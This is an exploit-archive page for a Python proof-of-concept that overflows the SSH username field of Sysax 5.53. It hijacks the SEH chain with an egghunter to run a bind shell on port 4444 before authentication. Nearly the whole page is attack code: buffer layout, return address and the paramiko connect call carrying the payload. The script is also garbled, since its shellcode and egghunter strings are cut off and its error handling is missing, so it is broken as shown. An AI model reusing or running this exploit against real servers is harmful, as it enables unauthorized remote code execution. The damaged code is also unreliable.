Sysax 5.53 – SSH ‘Username’ Remote Buffer Overflow Remote Code Execution (Egghunter)

  • 作者: Craig Freyman
    日期: 2012-02-27
  • 类别:
  • 来源:
  • #!/usr/bin/python
    #Title: Sysax <= 5.53 SSH Username BoF Pre Auth RCE (Egghunter)
    #Author: Craig Freyman (@cd1zz)
    #OS Tested: XP SP3 32bit, 2003 Server SP2 (No DEP)
    #Software Versions Tested: 5.53, 5.52, 5.50
    #Date Discovered: Febrary 22, 2012
    #Vendor Contacted: Febrary 23, 2012
    #Vendor Response: February 27, 2012
    #Vendor Fix: Sysax 5.55
    #Detailed Exploit Description:
    import paramiko,os,sys
    if len(sys.argv) != 3:
    print "[+] Usage: ./filename <Target IP> <Port>"
    host = sys.argv[1]
    port = int(sys.argv[2])
    egghunter = (
    # msfpayloadwindows/shell_bind_tcp LPORT=4444 R | msfencode -e -e x86/alpha_mixed X
    shell = ("DNWPDNWP"
    padding1 = "\x90" * 50
    padding2 = "\x90" * 50
    nseh = "\x90\x90\xeb\x80"	
    seh ="\x69\x26\x40\x00"	#00402669 PPR sysaxservd.exe
    junk = "A" * (9204 - len(egghunter + padding1 + padding2 + shell))
    buff = junk + shell + padding1 + egghunter + padding2 + nseh + seh
    print "============================================================================"
    print " Sysax <= 5.53 SSH Username BoF Pre Auth RCE"
    print "by cd1zz"
    print " "
    print "============================================================================"
    	transport = paramiko.Transport((host, port))	
    	print "[X] Unable to connect to " + host + " on port " + str(port)
    transport = paramiko.Transport((host, port))
    print "[+] Launching exploit against " + host + " on port " + str(port)
    print "[+] Done!"
    transport.connect(username = buff, password = "pwnag3")	